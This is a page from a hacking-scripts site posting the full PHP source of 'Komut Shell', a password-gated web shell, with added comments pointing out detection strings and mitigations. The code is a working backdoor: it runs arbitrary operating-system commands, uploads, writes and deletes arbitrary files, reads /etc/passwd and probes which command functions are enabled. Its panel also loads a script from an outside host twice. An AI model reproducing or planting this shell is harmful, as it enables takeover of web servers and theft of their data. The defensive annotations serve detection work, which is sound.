HackingScripts

Hack Scripts for everybody

Komut Shell

28 Apr 2015

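Komut Shell source code (a password-gated PHP web shell; its built-in "about" command identifies it as a copy of the Ajax Command Shell by Ironfist)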

~ by WebRooT

  1 <?php ?><?php
    // Komut Shell: a password-gated PHP web shell. Once the session is
    // authenticated, the script accepts an OS command (GET "runcmd"), a file
    // upload (multipart field "uploadedfile") and a file write (GET "savefile"
    // with POST "filetosave"/"filecontent").
    // For defenders: those parameter names, the login field "p4ssw0rD" and the
    // password literal below are fixed strings to hunt for in web roots and in
    // access logs.
    // The HTML panel further down also references a script on www.r57.gen.tr
    // (two SCRIPT SRC tags). NOTE(review): presumably a distributor beacon; a
    // browser that opens the panel would contact that host, so it is worth
    // checking in proxy/DNS logs — confirm.
  2 session_start();
    // Turns off PHP error reporting for this request, so failed operations
    // produce no warnings.
  3 error_reporting(0);
    // Hard-coded shared secret, compared in plaintext; the login form printed at
    // the end of the file repeats it in the page text.
  4 $password = "webr00t"; //Change this to your password ;)
  5 $version = "0.7B";
    // Quick-command buttons (Turkish labels): label => JavaScript call. The
    // runcommand(...) entries are sent back to this script as runcmd requests:
    // capability check, host info, /etc/passwd, listening sockets, process list.
  6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' => 'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' => "runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an | grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
    // Base name of this script. The templates further down print $ThisFile, which
    // PHP treats as a different (unset) variable, so the URLs they build are
    // relative to the current request.
  7 $thisfile = basename(__FILE__);
  8 $style = '<style type="text/css">
  9 .cmdthing {
 10     border-top-width: 0px;
 11     font-weight: bold;
 12     border-left-width: 0px;
 13     font-size: 10px;
 14     border-left-color: #000000;
 15     background: #000000;
 16     border-bottom-width: 0px;
 17     border-bottom-color: #FFFFFF;
 18     color: #FFFFFF;
 19     border-top-color: #008000;
 20     font-family: verdana;
 21     border-right-width: 0px;
 22     border-right-color: #000000;
 23 }
 24 input,textarea {
 25     border-top-width: 1px;
 26     font-weight: bold;
 27     border-left-width: 1px;
 28     font-size: 10px;
 29     border-left-color: #FFFFFF;
 30     background: #000000;
 31     border-bottom-width: 1px;
 32     border-bottom-color: #FFFFFF;
 33     color: #FFFFFF;
 34     border-top-color: #FFFFFF;
 35     font-family: verdana;
 36     border-right-width: 1px;
 37     border-right-color: #FFFFFF;
 38 }
 39 A:hover {
 40 text-decoration: none;
 41 }
 42 
 43 
 44 table,td,div {
 45 border-collapse: collapse;
 46 border: 1px solid #FFFFFF;
 47 }
 48 body {
 49 color: #FFFFFF;
 50 font-family: verdana;
 51 }
 52 </style>';
    // ^ Inline stylesheet for the panel, printed into the page head later on.
    //   Presentation only; the fixed CSS text can still serve as a content
    //   signature when scanning web roots for copies of this file.
 53 $sess = __FILE__ . $password;
    // ^ Name of the session slot that marks a logged-in client: this file's
    //   absolute path concatenated with the password.
 54 if (isset($_POST['p4ssw0rD'])) {
        // Login attempt: loose (==) plaintext comparison against the hard-coded
        // password. No attempt limit or delay is applied here.
 55     if ($_POST['p4ssw0rD'] == $password) {
            // Success: the submitted password itself is stored in the session.
 56         $_SESSION[$sess] = $_POST['p4ssw0rD'];
 57     } else {
            // Failure ends the request with this fixed body, which makes a simple
            // response marker for log or IDS matching.
 58         die("Wrong password");
 59     }
 60 }
 61 if ($_SESSION[$sess] == $password) {
 62     if (isset($_SESSION['workdir'])) {
            // Restore the working directory remembered from an earlier
            // "cd"/"changeworkdir" command, provided it still exists.
 63         if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
 64             chdir($_SESSION['workdir']);
 65         }
 66     }
 67     if (isset($_FILES['uploadedfile']['name'])) {
            // Upload handler: the file is moved into the current working directory
            // under the client-supplied base name. No extension, type or size check
            // is made here, and the result of move_uploaded_file() is ignored.
            // Mitigation: keep web-served directories non-writable for the PHP user
            // and disable script execution wherever uploads are allowed.
 68         $target_path = "./";
 69         $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
 70         if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
 71         }
 72     }
 73     if (isset($_GET['runcmd'])) {
 74         $cmd = $_GET['runcmd'];
            // Command dispatcher. The command travels in the query string, so it is
            // recorded verbatim in ordinary web-server access logs.
            // Echo a fake prompt: get_current_user() is the owner of this script
            // file; only the command text is HTML-escaped.
 75         print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) . "<br>";
 76         if ($cmd == "") {
 77             print "Empty Command..type \"shellhelp\" for some ehh...help";
 78         } elseif ($cmd == "upload") {
                // "upload": report the resolved working directory and whether it is
                // writable. The transfer itself is handled by the $_FILES check above.
 79             print '<br>Uploading to: ' . realpath(".");
 80             if (is_writable(realpath("."))) {
 81                 print "<br><b>I can write to this directory</b>";
 82             } else {
 83                 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
 84             }
 85         } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd, $file))) {
                // "cd <dir>" / "changeworkdir <dir>": change directory and remember
                // it in the session for later requests.
                // ereg() exists only up to PHP 5.x (removed in 7.0). NOTE(review): on
                // newer runtimes evaluation presumably stops with a fatal error at
                // this test — worth confirming when judging whether a found copy
                // was usable.
 86             if (file_exists($file[1]) && is_dir($file[1])) {
 87                 chdir($file[1]);
 88                 $_SESSION['workdir'] = $file[1];
 89                 print "Current directory changed to " . $file[1];
 90             } else {
 91                 print "Directory not found";
 92             }
 93         } elseif (ereg("editfile (.*)", $cmd, $file)) {
                // "editfile <path>": dump the file into a textarea (HTML-escaped line
                // by line) with a Save button. The path is echoed into the value
                // attribute without escaping.
 94             if (file_exists($file[1]) && !is_dir($file[1])) {
 95                 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
 96                 $contents = file($file[1]);
 97                 foreach ($contents as $line) {
 98                     print htmlspecialchars($line);
 99                 }
100                 print "</textarea><br><input size=80 type=text name=filetosave value=" . $file[1] . "><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
101             } else {
102                 print "File not found.";
103             }
104         } elseif (ereg("deletefile (.*)", $cmd, $file)) {
                // "deletefile <path>": rmdir() for a directory, unlink() for anything
                // else. The path is used exactly as supplied; no directory
                // restriction is applied here.
105             if (is_dir($file[1])) {
106                 if (rmdir($file[1])) {
107                     print "Directory succesfully deleted.";
108                 } else {
109                     print "Couldn't delete directory!";
110                 }
111             } else {
112                 if (unlink($file[1])) {
113                     print "File succesfully deleted.";
114                 } else {
115                     print "Couldn't delete file!";
116                 }
117             }
118         } elseif (strtolower($cmd) == "canirun") {
                // "canirun": capability probe. Reports whether passthru, exec, system
                // and shell_exec are available, then the safe_mode and open_basedir
                // settings (shown in red when set, i.e. treated as obstacles).
                // function_exists() is false for functions named in disable_functions,
                // so this output mirrors the php.ini hardening of the host.
119             print "<br>";
120             if (function_exists(passthru)) {
121                 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122             } else {
123                 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124             }
125             if (function_exists(exec)) {
126                 print "Exec: <b><font color=green>Enabled</b></font><br>";
127             } else {
128                 print "Exec: <b><font color=red>Disabled</b></font><br>";
129             }
130             if (function_exists(system)) {
131                 print "System: <b><font color=green>Enabled</b></font><br>";
132             } else {
133                 print "System: <b><font color=red>Disabled</b></font><br>";
134             }
135             if (function_exists(shell_exec)) {
136                 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137             } else {
138                 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139             }
140             print "<br><br>";
141             if (ini_get('safe_mode')) {
142                 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143             } else {
144                 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145             }
146             print "<br><br><br>";
147             if (ini_get('open_basedir')) {
148                 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149             } else {
150                 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151             }
152         }
153         //Directory listing: backend of the file browser tab
154         elseif (ereg("listdir (.*)", $cmd, $directory)) {
                // "listdir <dir>": chdir into the directory and print two columns
                // (directories, files). Each entry gets [D] delete, [W] set working
                // directory, or click-to-edit controls. Entry names and resolved paths
                // are written into the HTML and onclick handlers without escaping.
155             if (!file_exists($directory[1])) {
156                 die("Directory not found");
157             }
158             //Some variables
159             chdir($directory[1]);
160             $i = 0;
161             $f = 0;
162             $dirs = "";
163             $filez = "";
164             if (!ereg("/$", $directory[1])) //Does it end with a slash?
165             {
166                 $directory[1].= "/"; //If not, add one
167 
168             }
169             print "Listing directory: " . $directory[1] . "<br>";
170             print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171             if ($handle = opendir($directory[1])) {
172                 while (false !== ($file = readdir($handle))) {
173                     if (is_dir($file)) {
174                         $dirs[$i] = $file;
175                         $i++;
176                     } else {
177                         $filez[$f] = $file;
178                         $f++;
179                     }
180                 }
181                 print "<td>";
182                 foreach ($dirs as $directory) {
183                     print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" . realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir " . realpath($directory) . "','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) . "','GET'); \">" . $directory . "</b><br>";
184                 }
185                 print "</td><td>";
186                 foreach ($filez as $file) {
187                     print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" . realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188                 }
189                 print "</td></table>";
190             }
191         } elseif (strtolower($cmd) == "about") {
                // "about": static banner naming the upstream tool and the version;
                // the fixed text is usable as a content signature.
192             print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193         }
194         //Show info
195         elseif (strtolower($cmd) == "showinfo") {
                // "showinfo": free/total space of "/" (bytes divided by 1000000), the
                // resolved current path, and the output of "uname -a" via passthru().
196             if (function_exists(disk_free_space)) {
197                 $free = disk_free_space("/") / 1000000;
198             } else {
199                 $free = "N/A";
200             }
201             if (function_exists(disk_total_space)) {
202                 $total = trim(disk_total_space("/") / 1000000);
203             } else {
204                 $total = "N/A";
205             }
206             $path = realpath(".");
207             print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
208             if (function_exists(passthru)) {
209                 passthru("uname -a");
210             } else {
211                 print "Passthru is disabled :(";
212             }
213         }
214         //Read /etc/passwd
215         elseif (strtolower($cmd) == "etcpasswdfile") {
                // Passes the literal path '/etc/passwd/' (as written, with a trailing
                // slash) to file() and prints each returned line unescaped.
216             $pw = file('/etc/passwd/');
217             foreach ($pw as $line) {
218                 print $line;
219             }
220         }
221         //Execute any other command
222         else {
                // Anything not matched above is handed to the operating system.
                // Order tried: passthru($cmd); else exec() with the fixed string
                // "ls -la" (not $cmd); else system($cmd); else shell_exec($cmd).
                // Output is sent to the browser unescaped.
                // Detection: the web-server/PHP user spawning shell child processes.
                // Mitigation: with all four functions in disable_functions only the
                // final "none of the command functions works" message is reachable.
223             if (function_exists(passthru)) {
224                 passthru($cmd);
225             } else {
226                 if (function_exists(exec)) {
227                     exec("ls -la", $result);
228                     foreach ($result as $output) {
229                         print $output . "<br>";
230                     }
231                 } else {
232                     if (function_exists(system)) {
233                         system($cmd);
234                     } else {
235                         if (function_exists(shell_exec)) {
236                             print shell_exec($cmd);
237                         } else {
238                             print "Sorry, none of the command functions works.";
239                         }
240                     }
241                 }
242             }
243         }
244     } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) {
245         $file = $_POST['filetosave'];
            // File-write endpoint (savefile in the query string). The target path is
            // taken as-is from the request body, so it can be any path the PHP user
            // is able to reach.
246         if (!is_writable($file)) {
                // Tries to force mode 0777 before writing. An unexpected permission
                // change on a web file is a useful file-integrity-monitoring signal.
247             if (!chmod($file, 0777)) {
248                 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
249 
250             }
251         }
            // Truncate-and-write with the posted content. The return values of
            // fopen()/fwrite() are not checked, and nothing is reported to the client.
252         $fh = fopen($file, 'w');
253         $dt = $_POST['filecontent'];
254         fwrite($fh, $dt);
255         fclose($fh);
256     } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
264 function sf(){document.cmdform.command.focus();}
    // ^ Called from the body onload handler: puts keyboard focus in the command box.
    // Accumulated HTML for the output pane and for the command-history pane.
265 var outputcmd = "";
266 var cmdhistory = "";
267 function ClearScreen()
268 {
        // Reset the output buffer and blank the "output" pane (client side only).
269     outputcmd = "";
270     document.getElementById('output').innerHTML = outputcmd;
271 }
272 
273 function ClearHistory()
274 {
        // Reset the history buffer and blank the "history" pane. This clears the
        // browser view only; nothing on the server is touched.
275     cmdhistory = "";
276     document.getElementById('history').innerHTML = cmdhistory;
277 }
278 
279 function deletefile(file)
280 {
        // Ask for confirmation, then issue the server-side "deletefile <path>"
        // command through runcommand().
281     deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283     if(deleteit)
284     {
285         runcommand('deletefile ' + file,'GET');
286     }
287 }
288 
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
      // Fire-and-forget form POST: creates an XMLHttpRequest (with ActiveX
      // fallbacks for old Internet Explorer) and sends `parameters` as an
      // application/x-www-form-urlencoded body to `url`. No response handler is
      // attached, so the caller never learns whether the request succeeded.
291   http_request = false;
292   if (window.XMLHttpRequest) {
293      http_request = new XMLHttpRequest();
294      if (http_request.overrideMimeType) {
295         http_request.overrideMimeType('text/html');
296      }
297   } else if (window.ActiveXObject) {
298      try {
299         http_request = new ActiveXObject("Msxml2.XMLHTTP");
300      } catch (e) {
301         try {
302            http_request = new ActiveXObject("Microsoft.XMLHTTP");
303         } catch (e) {}
304      }
305   }
306   if (!http_request) {
307      alert('Cannot create XMLHTTP instance');
308      return false;
309   }
310 
311 
312   http_request.open('POST', url, true);
313   http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
314   http_request.setRequestHeader("Content-length", parameters.length);
315   http_request.setRequestHeader("Connection", "close");
316   http_request.send(parameters);
317 }
318 
319 
320 function SaveFile()
321 {
    // Client side of the file-write endpoint: POSTs the fields "filetosave" and
    // "filecontent" with "?savefile" in the URL. The PHP expression prints
    // $ThisFile, which is not the $thisfile variable set at the top of the script,
    // so the URL is relative to the current request. "Saved!" is shown without
    // looking at the server response.
    // Log hunting: POST requests to a PHP file with "savefile" in the query string.
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323                     "&filecontent=" + encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
326 }
327 
328 function runcommand(urltoopen,action,contenttosend){
    // Client side of the command channel. `urltoopen` is the command text,
    // `action` the HTTP method; `contenttosend` is never read in this function.
    // The command is prepended to the history pane (inserted as raw HTML), then
    // requested as "?runcmd=<command>" relative to the current URL, without URL
    // encoding. Log hunting: "runcmd=" in the query string of requests to a PHP file.
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335     var ajaxRequest;
336     try{
337         ajaxRequest = new XMLHttpRequest();
338     } catch (e){
339         try{
340             ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341         } catch (e) {
342             try{
343                 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344             } catch (e){
345                 alert("Wicked error, nothing we can do about it...");
346                 return false;
347             }
348         }
349     }
350     ajaxRequest.onreadystatechange = function(){
            // On completion, append the raw response to the output buffer and
            // scroll the pane to the bottom.
351         if(ajaxRequest.readyState == 4){
352         outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
353             document.getElementById('output').innerHTML = outputcmd;
354             var objDiv = document.getElementById("output");
355             objDiv.scrollTop = objDiv.scrollHeight;
356         }
357     }
358     ajaxRequest.open(action, "?runcmd="+urltoopen , true);
        // Only the GET case calls send(); any other action opens the request
        // without sending it.
359     if(action == "GET")
360     {
361     ajaxRequest.send(null);
362     }
363     document.cmdform.command.value='';
        // Returning false cancels the normal form submission when used from onsubmit.
364     return false;
365 }
366 
367 function set_tab_html(newhtml)
368 {
    // Replace the contents of the "commandtab" container with the given HTML.
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371 
372 function set_tab(newtab)
373 {
        // Tab switcher for the panel: builds the HTML for the selected tab and
        // writes it into the "commandtab" container. Some tabs also issue a
        // server command through runcommand().
374     if(newtab == "cmd")
375     {
            // Command line: submitting the form sends its text to runcommand().
376         newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
377     }
378     else if(newtab == "upload")
379     {
            // Upload: asks the server whether the working directory is writable, then
            // shows a multipart form with the file field "uploadedfile" and a
            // MAX_FILE_SIZE hint of 10000000. The form action prints $ThisFile, which
            // is not the $thisfile variable set at the top of the script.
380         runcommand('upload','GET');
381         newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
382     }
383     else if(newtab == "workingdir")
384     {
385         <?php
            // Server-side template: a form pre-filled with the resolved current
            // directory (re-joined from its path parts) that submits a
            // "changeworkdir" command, plus a shortcut to this script's own directory.
386         $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
387         $pathparts = explode("/", realpath("."));
388         foreach ($pathparts as $folder) {
389             $folders.= $folder . "/";
390         }
391         $folders.= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" . dirname(__FILE__) . "</i>";
392 ?>
393         newhtml = '<?php print $folders; ?>';
394     }
395     else if(newtab == "filebrowser")
396     {
            // File browser: help text plus a "listdir ." request for the working directory.
397         newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
398         runcommand('listdir .','GET');
399     }
400     else if(newtab == "createfile")
401     {
            // New file: an empty editor whose suggested save path is
            // <working dir>/<random number between 1000 and 999999>.txt, generated
            // server-side when the page is rendered.
402         newhtml = '<b>File Editor, under construction.</b>';
403         document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000, 999999) . ".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
404 
405     }
406         document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416 
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
            // Render one button per entry of the hard-coded $functions table. Both
            // the label and the onclick JavaScript come from that array, not from
            // the request.
419         foreach ($functions as $name => $execute) {
420             print '&nbsp;<input type="button" value="' . $name . '" onclick="' . $execute . '"><br>';
421         }
422 ?>
423 
424 </center>
425 
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447 
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
451 
452 <tr>
453 <td  height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466     }
467 } else {
468     print "<center><table border=0  height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz. (sifre=webr00t)<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
        // ^ Unauthenticated view: a login form that posts the field "p4ssw0rD" back
        //   to this script. The Turkish prompt includes "(sifre=webr00t)", i.e. the
        //   page text discloses the default password, so the gate does not limit
        //   access to whoever placed the file. The prompt and the field name are
        //   stable response-body strings for content scanning.
472 }
473 ?>